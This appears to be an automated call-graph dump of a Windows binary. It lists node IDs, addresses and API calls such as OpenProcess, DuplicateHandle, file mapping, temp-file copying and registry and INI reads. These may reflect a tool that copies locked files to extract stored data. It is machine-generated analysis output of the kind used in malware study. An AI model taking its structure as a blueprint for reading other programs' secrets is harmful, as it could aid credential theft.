39524->39525 39525->39523 39526 40afcf ??2@YAPAXI ??3@YAXPAX 39525->39526 39527 40e08d OpenProcess 39526->39527 39528 40e0a4 GetCurrentProcess DuplicateHandle 39527->39528 39532 40e152 39527->39532 39529 40e0d0 GetFileSize 39528->39529 39530 40e14a CloseHandle 39528->39530 39533 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39529->39533 39530->39532 39531 40e160 39535 40b04b ??3@YAXPAX 39531->39535 39532->39531 39534 406214 22 API calls 39532->39534 39536 40e0ea 39533->39536 39534->39531 39535->39523 39537 4096dc CreateFileW 39536->39537 39538 40e0f1 CreateFileMappingW 39537->39538 39539 40e140 CloseHandle CloseHandle 39538->39539 39540 40e10b MapViewOfFile 39538->39540 39539->39530 39541 40e13b CloseHandle 39540->39541 39542 40e11f WriteFile UnmapViewOfFile 39540->39542 39541->39539 39542->39541 39544 40e18c 39543->39544 39545 406b90 11 API calls 39544->39545 39546 40e19f 39545->39546 39547 40e1a7 memset 39546->39547 39548 40e299 39546->39548 39553 40e1e8 39547->39553 39549 4069a3 ??3@YAXPAX free 39548->39549 39550 40e2a4 39549->39550 39550->39515 39551 406e8f 13 API calls 39551->39553 39552 406b53 SetFilePointerEx ReadFile 39552->39553 39553->39551 39553->39552 39554 40e283 39553->39554 39555 40dd50 _wcsicmp 39553->39555 39559 40742e 8 API calls 39553->39559 39560 40aae3 wcslen wcslen _memicmp 39553->39560 39561 40e244 _snwprintf 39553->39561 39556 40e291 39554->39556 39557 40e288 free 39554->39557 39555->39553 39558 40aa04 free 39556->39558 39557->39556 39558->39548 39559->39553 39560->39553 39562 40a8d0 7 API calls 39561->39562 39562->39553 39564 40e2c2 39563->39564 39565 406b90 11 API calls 39564->39565 39585 40e2d3 39565->39585 39566 40e4a0 39567 4069a3 ??3@YAXPAX free 39566->39567 39569 40e4ab 39567->39569 39568 406e8f 13 API calls 39568->39585 39569->39515 39570 406b53 SetFilePointerEx ReadFile 39570->39585 39571 40e489 39572 40aa04 free 39571->39572 39573 40e491 39572->39573 39573->39566 39574 40e497 free 39573->39574 39574->39566 39575 40dd50 _wcsicmp 39575->39585 39576 40dd50 _wcsicmp 39577 40e376 memset 39576->39577 39578 40aa29 6 API calls 39577->39578 39578->39585 39579 40742e 8 API calls 39579->39585 39580 40e3e0 memcpy 39580->39585 39581 40e3b3 wcschr 39581->39585 39582 40e3fb memcpy 39582->39585 39583 40e416 memcpy 39583->39585 39584 40e431 memcpy 39584->39585 39585->39566 39585->39568 39585->39570 39585->39571 39585->39575 39585->39576 39585->39579 39585->39580 39585->39581 39585->39582 39585->39583 39585->39584 39586->39501 39589 40a980 39587->39589 39588 40a8bb 39588->39426 39592 40a8d0 7 API calls 39588->39592 39589->39588 39590 40a995 _wcsicmp 39589->39590 39591 40a99c wcscmp 39589->39591 39590->39589 39591->39589 39592->39426 39593->39430 39594->39434 39596 40aa23 RegEnumValueW 39595->39596 39596->39441 39596->39442 39597->39445 39598->39447 39600 405335 39599->39600 39601 40522a 39599->39601 39600->39027 39602 40b2cc 27 API calls 39601->39602 39603 405234 39602->39603 39604 40a804 8 API calls 39603->39604 39605 40523a 39604->39605 39644 40b273 39605->39644 39607 405248 _mbscpy _mbscat GetProcAddress 39608 40b273 27 API calls 39607->39608 39609 405279 39608->39609 39647 405211 GetProcAddress 39609->39647 39645 40b58d 27 API calls 39644->39645 39646 40b18c 39645->39646 39646->39607 39657 405220 39 API calls 39656->39657 39658 405369 39657->39658 39658->39459 39658->39460 39659->39462 39664 40440c FreeLibrary 39663->39664 39665 40436d 39664->39665 39666 40a804 8 API calls 39665->39666 39667 404377 39666->39667 39668 404383 39667->39668 39669 404405 39667->39669 39670 40b273 27 API calls 39668->39670 39669->39032 39669->39034 39669->39035 39671 40438d GetProcAddress 39670->39671 39684 404413 FreeLibrary 39683->39684 39730 403a29 39729->39730 39744 403bed memset memset 39730->39744 39732 403ae7 39757 40b1ab free free 39732->39757 39733 403a3f memset 39738 403a2f 39733->39738 39735 403aef 39735->39089 39736 409d1f 6 API calls 39736->39738 39737 409b98 GetFileAttributesW 39737->39738 39738->39732 39738->39733 39738->39736 39738->39737 39739 40a8d0 7 API calls 39738->39739 39739->39738 39741 40a051 GetFileTime CloseHandle 39740->39741 39742 4039ca CompareFileTime 39740->39742 39741->39742 39742->39089 39743->39086 39745 414c2e 16 API calls 39744->39745 39746 403c38 39745->39746 39747 409719 2 API calls 39746->39747 39748 403c3f wcscat 39747->39748 39749 414c2e 16 API calls 39748->39749 39750 403c61 39749->39750 39751 409719 2 API calls 39750->39751 39752 403c68 wcscat 39751->39752 39758 403af5 39752->39758 39755 403af5 20 API calls 39756 403c95 39755->39756 39756->39738 39757->39735 39759 403b02 39758->39759 39760 40ae18 9 API calls 39759->39760 39762 403b37 39760->39762 39761 40ae51 9 API calls 39761->39762 39762->39761 39763 403bdb 39762->39763 39764 40add4 wcscmp wcscmp 39762->39764 39767 40ae18 9 API calls 39762->39767 39768 40aebe FindClose 39762->39768 39769 40a8d0 7 API calls 39762->39769 39765 40aebe FindClose 39763->39765 39764->39762 39766 403be6 39765->39766 39766->39755 39767->39762 39768->39762 39769->39762 39771 409d1f 6 API calls 39770->39771 39772 404190 39771->39772 39785 409b98 GetFileAttributesW 39772->39785 39774 40419c 39775 4041a7 6 API calls 39774->39775 39776 40435c 39774->39776 39778 40424f 39775->39778 39776->39114 39778->39776 39779 40425e memset 39778->39779 39781 409d1f 6 API calls 39778->39781 39782 40a8ab 9 API calls 39778->39782 39786 414842 39778->39786 39779->39778 39780 404296 wcscpy 39779->39780 39780->39778 39781->39778 39783 4042b6 memset memset _snwprintf wcscpy 39782->39783 39783->39778 39784->39112 39785->39774 39789 41443e 39786->39789 39788 414866 39788->39778 39790 41444b 39789->39790 39791 414451 39790->39791 39792 4144a3 GetPrivateProfileStringW 39790->39792 39793 414491 39791->39793 39794 414455 wcschr 39791->39794 39792->39788 39796 414495 WritePrivateProfileStringW 39793->39796 39794->39793 39795 414463 _snwprintf 39794->39795 39795->39796 39796->39788 40060 413f4f 40033->40060 40036 413f37 K32GetModuleFileNameExW 40037 413f4a 40036->40037 40037->39180 40039 413969 wcscpy 40038->40039 40040 41396c wcschr 40038->40040 40043 413a3a 40039->40043 40040->40039 40042 41398e 40040->40042 40065 4097f7 wcslen wcslen _memicmp 40042->40065 40043->39180 40045 41399a 40046 4139a4 memset 40045->40046 40047 4139e6 40045->40047 40066 409dd5 GetWindowsDirectoryW wcscpy 40046->40066 40049 413a31 wcscpy 40047->40049 40050 4139ec memset 40047->40050 40049->40043 40067 409dd5 GetWindowsDirectoryW wcscpy 40050->40067 40051 4139c9 wcscpy wcscat 40051->40043 40053 413a11 memcpy wcscat 40053->40043 40055 413cb0 GetModuleHandleW 40054->40055 40056 413cda 40054->40056 40055->40056 40057 413cbf GetProcAddress 40055->40057 40058 413ce3 GetProcessTimes 40056->40058 40059 413cf6 40056->40059 40057->40056 40058->39183 40059->39183 40061 413f2f 40060->40061 40062 413f54 40060->40062 40061->40036 40061->40037 40063 40a804 8 API calls 40062->40063 40064 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40063->40064 40064->40061 40065->40045 40066->40051 40067->40053 40068->39203 40069->39226 40071 409cf9 GetVersionExW 40070->40071 40072 409d0a 40070->40072 40071->40072 40072->39233 40072->39236 40073->39239 40074->39242 40075->39244 40076->39310 40078 40bba5 40077->40078 40125 40cc26 40078->40125 40081 40bd4b 40146 40cc0c 40081->40146 40086 40b2cc 27 API calls 40087 40bbef 40086->40087 40153 40ccf0 _wcsicmp 40087->40153 40089 40bbf5 40089->40081 40154 40ccb4 6 API calls 40089->40154 40091 40bc26 40092 40cf04 17 API calls 40091->40092 40093 40bc2e 40092->40093 40094 40bd43 40093->40094 40095 40b2cc 27 API calls 40093->40095 40096 40cc0c 4 API calls 40094->40096 40097 40bc40 40095->40097 40096->40081 40155 40ccf0 _wcsicmp 40097->40155 40099 40bc46 40099->40094 40100 40bc61 memset memset WideCharToMultiByte 40099->40100 40156 40103c strlen 40100->40156 40102 40bcc0 40103 40b273 27 API calls 40102->40103 40104 40bcd0 memcmp 40103->40104 40104->40094 40105 40bce2 40104->40105 40106 404423 37 API calls 40105->40106 40107 40bd10 40106->40107 40107->40094 40108 40bd3a LocalFree 40107->40108 40109 40bd1f memcpy 40107->40109 40108->40094 40109->40108 40110->39324 40112 409a74 GetTempFileNameW 40111->40112 40113 409a66 GetWindowsDirectoryW 40111->40113 40112->39321 40113->40112 40114->39362 40115->39362 40116->39362 40117->39362 40118->39362 40119->39362 40120->39362 40121->39362 40122->39362 40123->39337 40124->39359 40157 4096c3 CreateFileW 40125->40157 40127 40cc34 40128 40cc3d GetFileSize 40127->40128 40129 40bbca 40127->40129 40130 40afcf 2 API calls 40128->40130 40129->40081 40137 40cf04 40129->40137 40131 40cc64 40130->40131 40158 40a2ef ReadFile 40131->40158 40133 40cc71 40159 40ab4a MultiByteToWideChar 40133->40159 40135 40cc95 CloseHandle 40136 40b04b ??3@YAXPAX 40135->40136 40136->40129 40138 40b633 free 40137->40138 40139 40cf14 40138->40139 40165 40b1ab free free 40139->40165 40141 40bbdd 40141->40081 40141->40086 40142 40cf1b 40142->40141 40144 40cfef 40142->40144 40166 40cd4b 40142->40166 40145 40cd4b 14 API calls 40144->40145 40145->40141 40147 40b633 free 40146->40147 40148 40cc15 40147->40148 40149 40aa04 free 40148->40149 40150 40cc1d 40149->40150 40212 40b1ab free free 40150->40212 40152 40b7d4 memset CreateFileW 40152->39316 40152->39317 40153->40089 40154->40091 40155->40099 40156->40102 40157->40127 40158->40133 40160 40ab6b 40159->40160 40164 40ab93 40159->40164 40161 40a9ce 4 API calls 40160->40161 40162 40ab74 40161->40162 40163 40ab7c MultiByteToWideChar 40162->40163 40163->40164 40164->40135 40165->40142 40167 40cd7b 40166->40167 40200 40aa29 6 API calls 40167->40200 40169 40cef5 40170 40aa04 free 40169->40170 40171 40cefd 40170->40171 40171->40142 40172 40cd89 40172->40169 40201 40aa29 6 API calls 40172->40201 40174 40ce1d 40202 40aa29 6 API calls 40174->40202 40176 40ce3e 40177 40ce6a 40176->40177 40203 40abb7 wcslen memmove 40176->40203 40178 40ce9f 40177->40178 40206 40abb7 wcslen memmove 40177->40206 40209 40a8d0 7 API calls 40178->40209 40181 40ce56 40204 40aa71 wcslen 40181->40204 40183 40ceb5 40210 40a8d0 7 API calls 40183->40210 40185 40ce8b 40207 40aa71 wcslen 40185->40207 40186 40ce5e 40205 40abb7 wcslen memmove 40186->40205 40188 40ce93 40208 40abb7 wcslen memmove 40188->40208 40192 40cecb 40211 40d00b malloc memcpy free free 40192->40211 40194 40cedd 40195 40aa04 free 40194->40195 40196 40cee5 40195->40196 40197 40aa04 free 40196->40197 40198 40ceed 40197->40198 40199 40aa04 free 40198->40199 40199->40169 40200->40172 40201->40174 40202->40176 40203->40181 40204->40186 40205->40177 40206->40185 40207->40188 40208->40178 40209->40183 40210->40192 40211->40194 40212->40152 40213->39378 40214->39385 40224 44def7 40225 44df07 40224->40225 40226 44df00 ??3@YAXPAX 40224->40226 40227 44df17 40225->40227 40228 44df10 ??3@YAXPAX 40225->40228 40226->40225 40229 44df27 40227->40229 40230 44df20 ??3@YAXPAX 40227->40230 40228->40227 40231 44df37 40229->40231 40232 44df30 ??3@YAXPAX 40229->40232 40230->40229 40232->40231 37537 44dea5 37538 44deb5 FreeLibrary 37537->37538 37539 44dec3 37537->37539 37538->37539 40233 4148b6 FindResourceW 40234 4148f9 40233->40234 40235 4148cf SizeofResource 40233->40235 40235->40234 40236 4148e0 LoadResource 40235->40236 40236->40234 40237 4148ee LockResource 40236->40237 40237->40234 37721 415304 free 37540 415320 realloc 37541 415340 37540->37541 37542 41534d 37540->37542 37544 416760 11 API calls 37542->37544 37544->37541 40238 441b3f 40248 43a9f6 40238->40248 40240 441b61 40421 4386af memset 40240->40421 40242 44189a 40243 442bd4 40242->40243 40244 4418e2 40242->40244 40245 4418ea 40243->40245 40423 441409 memset 40243->40423 40244->40245 40422 4414a9 12 API calls 40244->40422 40249 43aa20 40248->40249 40250 43aadf 40248->40250 40249->40250 40251 43aa34 memset 40249->40251 40250->40240 40252 43aa56 40251->40252 40253 43aa4d 40251->40253 40424 43a6e7 40252->40424 40432 42c02e memset 40253->40432 40258 43aad3 40434 4169a7 11 API calls 40258->40434 40259 43aaae 40259->40250 40259->40258 40274 43aae5 40259->40274 40260 43ac18 40263 43ac47 40260->40263 40436 42bbd5 memcpy memcpy memcpy memset memcpy 40260->40436 40264 43aca8 40263->40264 40437 438eed 16 API calls 40263->40437 40267 43acd5 40264->40267 40439 4233ae 11 API calls 40264->40439 40440 423426 11 API calls 40267->40440 40268 43ac87 40438 4233c5 16 API calls 40268->40438 40272 43ace1 40441 439811 163 API calls 40272->40441 40273 43a9f6 161 API calls 40273->40274 40274->40250 40274->40260 40274->40273 40435 439bbb 22 API calls 40274->40435 40276 43acfd 40281 43ad2c 40276->40281 40442 438eed 16 API calls 40276->40442 40278 43ad19 40443 4233c5 16 API calls 40278->40443 40279 43ad58 40444 44081d 163 API calls 40279->40444 40281->40279 40285 43add9 40281->40285 40284 43ae3a memset 40286 43ae73 40284->40286 40285->40285 40448 423426 11 API calls 40285->40448 40449 42e1c0 147 API calls 40286->40449 40287 43adab 40446 438c4e 163 API calls 40287->40446 40290 43ad6c 40290->40250 40290->40287 40445 42370b memset memcpy memset 40290->40445 40292 43adcc 40447 440f84 12 API calls 40292->40447 40293 43ae96 40450 42e1c0 147 API calls 40293->40450 40296 43aea8 40297 43aec1 40296->40297 40451 42e199 147 API calls 40296->40451 40298 43af00 40297->40298 40452 42e1c0 147 API calls 40297->40452 40298->40250 40302 43af1a 40298->40302 40303 43b3d9 40298->40303 40453 438eed 16 API calls 40302->40453 40308 43b3f6 40303->40308 40312 43b4c8 40303->40312 40305 43b60f 40305->40250 40512 4393a5 17 API calls 40305->40512 40307 43af2f 40454 4233c5 16 API calls 40307->40454 40494 432878 12 API calls 40308->40494 40310 43af51 40455 423426 11 API calls 40310->40455 40320 43b4f2 40312->40320 40500 42bbd5 memcpy memcpy memcpy memset memcpy 40312->40500 40314 43af7d 40456 423426 11 API calls 40314->40456 40318 43b529 40502 44081d 163 API calls 40318->40502 40319 43af94 40457 423330 11 API calls 40319->40457 40501 43a76c 21 API calls 40320->40501 40324 43afca 40458 423330 11 API calls 40324->40458 40325 43b47e 40328 43b497 40325->40328 40497 42374a memcpy memset memcpy memcpy memcpy 40325->40497 40326 43b544 40329 43b55c 40326->40329 40503 42c02e memset 40326->40503 40498 4233ae 11 API calls 40328->40498 40504 43a87a 163 API calls 40329->40504 40330 43afdb 40459 4233ae 11 API calls 40330->40459 40335 43b428 40346 43b462 40335->40346 40495 432b60 16 API calls 40335->40495 40337 43b56c 40340 43b58a 40337->40340 40505 423330 11 API calls 40337->40505 40338 43b4b1 40499 423399 11 API calls 40338->40499 40339 43afee 40460 44081d 163 API calls 40339->40460 40506 440f84 12 API calls 40340->40506 40342 43b4c1 40508 42db80 163 API calls 40342->40508 40496 423330 11 API calls 40346->40496 40348 43b592 40507 43a82f 16 API calls 40348->40507 40351 43b5b4 40509 438c4e 163 API calls 40351->40509 40353 43b5cf 40510 42c02e memset 40353->40510 40355 43b005 40355->40250 40359 43b01f 40355->40359 40461 42d836 163 API calls 40355->40461 40356 43b1ef 40471 4233c5 16 API calls 40356->40471 40359->40356 40469 423330 11 API calls 40359->40469 40470 42d71d 163 API calls 40359->40470 40360 43b212 40472 423330 11 API calls 40360->40472 40361 43b087 40462 4233ae 11 API calls 40361->40462 40362 43add4 40362->40305 40511 438f86 16 API calls 40362->40511 40366 43b22a 40473 42ccb5 11 API calls 40366->40473 40369 43b23f 40474 4233ae 11 API calls 40369->40474 40370 43b10f 40465 423330 11 API calls 40370->40465 40372 43b257 40475 4233ae 11 API calls 40372->40475 40376 43b129 40466 4233ae 11 API calls 40376->40466 40377 43b26e 40476 4233ae 11 API calls 40377->40476 40380 43b09a 40380->40370 40463 42cc15 19 API calls 40380->40463 40464 4233ae 11 API calls 40380->40464 40381 43b282 40477 43a87a 163 API calls 40381->40477 40383 43b13c 40467 440f84 12 API calls 40383->40467 40385 43b29d 40478 423330 11 API calls 40385->40478 40388 43b15f 40468 4233ae 11 API calls 40388->40468 40389 43b2af 40391 43b2b8 40389->40391 40392 43b2ce 40389->40392 40479 4233ae 11 API calls 40391->40479 40480 440f84 12 API calls 40392->40480 40395 43b2c9 40482 4233ae 11 API calls 40395->40482 40396 43b2da 40481 42370b memset memcpy memset 40396->40481 40399 43b2f9 40483 423330 11 API calls 40399->40483 40401 43b30b 40484 423330 11 API calls 40401->40484 40403 43b325 40485 423399 11 API calls 40403->40485 40405 43b332 40486 4233ae 11 API calls 40405->40486 40407 43b354 40487 423399 11 API calls 40407->40487 40409 43b364 40488 43a82f 16 API calls 40409->40488 40411 43b370 40489 42db80 163 API calls 40411->40489 40413 43b380 40490 438c4e 163 API calls 40413->40490 40415 43b39e 40491 423399 11 API calls 40415->40491 40417 43b3ae 40492 43a76c 21 API calls 40417->40492 40419 43b3c3 40493 423399 11 API calls 40419->40493 40421->40242 40422->40245 40423->40243 40425 43a6f5 40424->40425 40431 43a765 40424->40431 40425->40431 40513 42a115 40425->40513 40429 43a73d 40430 42a115 147 API calls 40429->40430 40429->40431 40430->40431 40431->40250 40433 4397fd memset 40431->40433 40432->40252 40433->40259 40434->40250 40435->40274 40436->40263 40437->40268 40438->40264 40439->40267 40440->40272 40441->40276 40442->40278 40443->40281 40444->40290 40445->40287 40446->40292 40447->40362 40448->40284 40449->40293 40450->40296 40451->40297 40452->40297 40453->40307 40454->40310 40455->40314 40456->40319 40457->40324 40458->40330 40459->40339 40460->40355 40461->40361 40462->40380 40463->40380 40464->40380 40465->40376 40466->40383 40467->40388 40468->40359 40469->40359 40470->40359 40471->40360 40472->40366 40473->40369 40474->40372 40475->40377 40476->40381 40477->40385 40478->40389 40479->40395 40480->40396 40481->40395 40482->40399 40483->40401 40484->40403 40485->40405 40486->40407 40487->40409 40488->40411 40489->40413 40490->40415 40491->40417 40492->40419 40493->40362 40494->40335 40495->40346 40496->40325 40497->40328 40498->40338 40499->40342 40500->40320 40501->40318 40502->40326 40503->40329 40504->40337 40505->40340 40506->40348 40507->40342 40508->40351 40509->40353 40510->40362 40511->40305 40512->40250 40514 42a175 40513->40514 40516 42a122 40513->40516 40514->40431 40519 42b13b 147 API calls 40514->40519 40516->40514 40517 42a115 147 API calls 40516->40517 40520 43a174 40516->40520 40544 42a0a8 147 API calls 40516->40544 40517->40516 40519->40429 40534 43a196 40520->40534 40535 43a19e 40520->40535 40521 43a306 40521->40534 40557 4388c4 14 API calls 40521->40557 40524 42a115 147 API calls 40524->40535 40525 415a91 memset 40525->40535 40526 43a642 40526->40534 40561 4169a7 11 API calls 40526->40561 40528 4165ff 11 API calls 40528->40535 40530 43a635 40560 42c02e memset 40530->40560 40534->40516 40535->40521 40535->40524 40535->40525 40535->40528 40535->40534 40545 42ff8c 40535->40545 40553 439504 13 API calls 40535->40553 40554 4312d0 147 API calls 40535->40554 40555 42be4c memcpy memcpy memcpy memset memcpy 40535->40555 40556 43a121 11 API calls 40535->40556 40537 4169a7 11 API calls 40538 43a325 40537->40538 40538->40526 40538->40530 40538->40534 40538->40537 40539 42b5b5 memset memcpy 40538->40539 40540 42bf4c 14 API calls 40538->40540 40543 4165ff 11 API calls 40538->40543 40558 42b63e 14 API calls 40538->40558 40559 42bfcf memcpy 40538->40559 40539->40538 40540->40538 40543->40538 40544->40516 40546 43817e 139 API calls 40545->40546 40547 42ff99 40546->40547 40548 42ffe3 40547->40548 40549 42ffd0 40547->40549 40552 42ff9d 40547->40552 40563 4169a7 11 API calls 40548->40563 40562 4169a7 11 API calls 40549->40562 40552->40535 40553->40535 40554->40535 40555->40535 40556->40535 40557->40538 40558->40538 40559->40538 40560->40526 40561->40534 40562->40552 40563->40552 40590 41493c EnumResourceNamesW 37546 4287c1 37547 4287d2 37546->37547 37548 429ac1 37546->37548 37549 428818 37547->37549 37550 42881f 37547->37550 37564 425711 37547->37564 37563 425ad6 37548->37563 37616 415c56 11 API calls 37548->37616 37583 42013a 37549->37583 37611 420244 97 API calls 37550->37611 37555 4260dd 37610 424251 120 API calls 37555->37610 37557 4259da 37609 416760 11 API calls 37557->37609 37562 429a4d 37566 429a66 37562->37566 37567 429a9b 37562->37567 37564->37548 37564->37557 37564->37562 37565 422aeb memset memcpy memcpy 37564->37565 37569 4260a1 37564->37569 37579 4259c2 37564->37579 37582 425a38 37564->37582 37599 4227f0 memset memcpy 37564->37599 37600 422b84 15 API calls 37564->37600 37601 422b5d memset memcpy memcpy 37564->37601 37602 422640 13 API calls 37564->37602 37604 4241fc 11 API calls 37564->37604 37605 42413a 90 API calls 37564->37605 37565->37564 37612 415c56 11 API calls 37566->37612 37571 429a96 37567->37571 37614 416760 11 API calls 37567->37614 37608 415c56 11 API calls 37569->37608 37615 424251 120 API calls 37571->37615 37574 429a7a 37613 416760 11 API calls 37574->37613 37579->37563 37603 415c56 11 API calls 37579->37603 37582->37579 37606 422640 13 API calls 37582->37606 37607 4226e0 12 API calls 37582->37607 37584 42014c 37583->37584 37587 420151 37583->37587 37626 41e466 97 API calls 37584->37626 37586 420162 37586->37564 37587->37586 37588 4201b3 37587->37588 37589 420229 37587->37589 37590 4201b8 37588->37590 37591 4201dc 37588->37591 37589->37586 37592 41fd5e 86 API calls 37589->37592 37617 41fbdb 37590->37617 37591->37586 37595 4201ff 37591->37595 37623 41fc4c 37591->37623 37592->37586 37595->37586 37598 42013a 97 API calls 37595->37598 37598->37586 37599->37564 37600->37564 37601->37564 37602->37564 37603->37557 37604->37564 37605->37564 37606->37582 37607->37582 37608->37557 37609->37555 37610->37563 37611->37564 37612->37574 37613->37571 37614->37571 37615->37548 37616->37557 37618 41fbf8 37617->37618 37621 41fbf1 37617->37621 37631 41ee26 37618->37631 37622 41fc39 37621->37622 37641 4446ce 11 API calls 37621->37641 37622->37586 37627 41fd5e 37622->37627 37624 41ee6b 86 API calls 37623->37624 37625 41fc5d 37624->37625 37625->37591 37626->37587 37629 41fd65 37627->37629 37628 41fdab 37628->37586 37629->37628 37630 41fbdb 86 API calls 37629->37630 37630->37629 37632 41ee41 37631->37632 37633 41ee32 37631->37633 37642 41edad 37632->37642 37645 4446ce 11 API calls 37633->37645 37636 41ee3c 37636->37621 37639 41ee58 37639->37636 37647 41ee6b 37639->37647 37641->37622 37651 41be52 37642->37651 37645->37636 37646 41eb85 11 API calls 37646->37639 37648 41ee70 37647->37648 37649 41ee78 37647->37649 37707 41bf99 86 API calls 37648->37707 37649->37636 37652 41be6f 37651->37652 37653 41be5f 37651->37653 37658 41be8c 37652->37658 37672 418c63 37652->37672 37686 4446ce 11 API calls 37653->37686 37656 41be69 37656->37636 37656->37646 37658->37656 37659 41bf3a 37658->37659 37660 41bed1 37658->37660 37663 41bee7 37658->37663 37689 4446ce 11 API calls 37659->37689 37662 41bef0 37660->37662 37666 41bee2 37660->37666 37662->37663 37664 41bf01 37662->37664 37663->37656 37690 41a453 86 API calls 37663->37690 37665 41bf24 memset 37664->37665 37670 41bf14 37664->37670 37687 418a6d memset memcpy memset 37664->37687 37665->37656 37676 41ac13 37666->37676 37688 41a223 memset memcpy memset 37670->37688 37671 41bf20 37671->37665 37675 418c72 37672->37675 37673 418c94 37673->37658 37674 418d51 memset memset 37674->37673 37675->37673 37675->37674 37677 41ac52 37676->37677 37678 41ac3f memset 37676->37678 37680 41ac6a 37677->37680 37691 41dc14 19 API calls 37677->37691 37683 41acd9 37678->37683 37682 41aca1 37680->37682 37692 41519d 37680->37692 37682->37683 37684 41acc0 memset 37682->37684 37685 41accd memcpy 37682->37685 37683->37663 37684->37683 37685->37683 37686->37656 37687->37670 37688->37671 37689->37663 37691->37680 37695 4175ed 37692->37695 37703 417570 SetFilePointer 37695->37703 37698 41760a ReadFile 37699 417637 37698->37699 37700 417627 GetLastError 37698->37700 37701 41763e memset 37699->37701 37702 4151b3 37699->37702 37700->37702 37701->37702 37702->37682 37704 4175b2 37703->37704 37705 41759c GetLastError 37703->37705 37704->37698 37704->37702 37705->37704 37706 4175a8 GetLastError 37705->37706 37706->37704 37707->37649 37708 417bc5 37709 417c61 37708->37709 37710 417bda 37708->37710 37710->37709 37711 417bf6 UnmapViewOfFile CloseHandle 37710->37711 37713 417c2c 37710->37713 37715 4175b7 37710->37715 37711->37710 37711->37711 37713->37710 37720 41851e 20 API calls 37713->37720 37716 4175d6 CloseHandle 37715->37716 37717 4175c8 37716->37717 37718 4175df 37716->37718 37717->37718 37719 4175ce Sleep 37717->37719 37718->37710 37719->37716 37720->37713 37727 4415ea 37735 4304b2 37727->37735 37729 4415fe 37730 4418ea 37729->37730 37731 442bd4 37729->37731 37732 4418e2 37729->37732 37731->37730 37783 441409 memset 37731->37783 37732->37730 37782 4414a9 12 API calls 37732->37782 37784 43041c 12 API calls 37735->37784 37737 4304cd 37742 430557 37737->37742 37785 43034a 37737->37785 37739 4304f3 37739->37742 37789 430468 11 API calls 37739->37789 37741 430506 37741->37742 37743 43057b 37741->37743 37790 43817e 37741->37790 37742->37729 37795 415a91 37743->37795 37748 4305e4 37748->37742 37800 4328e4 12 API calls 37748->37800 37750 43052d 37750->37742 37750->37743 37753 430542 37750->37753 37752 4305fa 37754 430609 37752->37754 37801 423383 11 API calls 37752->37801 37753->37742 37794 4169a7 11 API calls 37753->37794 37802 423330 11 API calls 37754->37802 37757 430634 37803 423399 11 API calls 37757->37803 37759 430648 37804 4233ae 11 API calls 37759->37804 37761 43066b 37805 423330 11 API calls 37761->37805 37763 43067d 37806 4233ae 11 API calls 37763->37806 37765 430695 37807 423330 11 API calls 37765->37807 37767 4306d6 37809 423330 11 API calls 37767->37809 37768 4306a7 37768->37767 37769 4306c0 37768->37769 37808 4233ae 11 API calls 37769->37808 37772 4306d1 37810 430369 17 API calls 37772->37810 37774 4306f3 37811 423330 11 API calls 37774->37811 37776 430704 37812 423330 11 API calls 37776->37812 37778 430710 37813 423330 11 API calls 37778->37813 37780 43071e 37814 423383 11 API calls 37780->37814 37782->37730 37783->37731 37784->37737 37786 43034e 37785->37786 37788 430359 37785->37788 37815 415c23 memcpy 37786->37815 37788->37739 37789->37741 37791 438187 37790->37791 37793 438192 37790->37793 37816 4380f6 37791->37816 37793->37750 37794->37742 37796 415a9d 37795->37796 37797 415ab3 37796->37797 37798 415aa4 memset 37796->37798 37797->37742 37799 4397fd memset 37797->37799 37798->37797 37799->37748 37800->37752 37801->37754 37802->37757 37803->37759 37804->37761 37805->37763 37806->37765 37807->37768 37808->37772 37809->37772 37810->37774 37811->37776 37812->37778 37813->37780 37814->37742 37815->37788 37818 43811f 37816->37818 37817 438164 37817->37793 37818->37817 37821 437e5e 37818->37821 37844 4300e8 37818->37844 37852 437d3c 37821->37852 37823 437eb3 37823->37818 37824 437ea9 37824->37823 37829 437f22 37824->37829 37867 41f432 37824->37867 37827 437f06 37917 415c56 11 API calls 37827->37917 37831 437f7f 37829->37831 37918 432d4e 37829->37918 37830 437f95 37922 415c56 11 API calls 37830->37922 37831->37830 37833 43802b 37831->37833 37878 4165ff 37833->37878 37835 437fa3 37835->37823 37924 41f638 104 API calls 37835->37924 37840 43806b 37841 438094 37840->37841 37923 42f50e 138 API calls 37840->37923 37841->37835 37843 4300e8 3 API calls 37841->37843 37843->37835 37845 430128 37844->37845 37848 4300fa 37844->37848 37847 430196 memset 37845->37847 37849 4301bc 37847->37849 37851 4301de 37847->37851 37848->37845 37848->37851 38331 432f8c 37848->38331 37850 4301c9 memcpy 37849->37850 37849->37851 37850->37851 37851->37818 37853 437d69 37852->37853 37856 437d80 37852->37856 37937 437ccb 11 API calls 37853->37937 37855 437d76 37855->37824 37856->37855 37857 437da3 37856->37857 37859 437d90 37856->37859 37925 438460 37857->37925 37859->37855 37941 437ccb 11 API calls 37859->37941 37861 437de8 37940 424f26 123 API calls 37861->37940 37863 437dcb 37863->37861 37938 444283 13 API calls 37863->37938 37865 437dfc 37939 437ccb 11 API calls 37865->37939 37868 41f54d 37867->37868 37872 41f44f 37867->37872 37869 41f466 37868->37869 38135 41c635 memset memset 37868->38135 37869->37827 37869->37829 37872->37869 37876 41f50b 37872->37876 38106 41f1a5 37872->38106 38131 41c06f memcmp 37872->38131 38132 41f3b1 90 API calls 37872->38132 38133 41f398 86 API calls 37872->38133 37876->37868 37876->37869 38134 41c295 86 API calls 37876->38134 37879 4165a0 11 API calls 37878->37879 37880 41660d 37879->37880 37881 437371 37880->37881 37882 41703f 11 API calls 37881->37882 37883 437399 37882->37883 37884 43739d 37883->37884 37886 4373ac 37883->37886 38240 4446ea 11 API calls 37884->38240 37887 416935 16 API calls 37886->37887 37903 4373ca 37887->37903 37888 437584 37890 4375bc 37888->37890 38247 42453e 123 API calls 37888->38247 37889 438460 134 API calls 37889->37903 37892 415c7d 16 API calls 37890->37892 37893 4375d2 37892->37893 37897 4373a7 37893->37897 38248 4442e6 37893->38248 37896 4375e2 37896->37897 38255 444283 13 API calls 37896->38255 37897->37840 37899 415a91 memset 37899->37903 37902 43758f 38246 42453e 123 API calls 37902->38246 37903->37888 37903->37889 37903->37899 37903->37902 37916 437d3c 135 API calls 37903->37916 38222 4251c4 37903->38222 38241 425433 13 API calls 37903->38241 38242 425413 17 API calls 37903->38242 38243 42533e 16 API calls 37903->38243 38244 42538f 16 API calls 37903->38244 38245 42453e 123 API calls 37903->38245 37906 4375f4 37910 437620 37906->37910 37911 43760b 37906->37911 37908 43759f 37909 416935 16 API calls 37908->37909 37909->37888 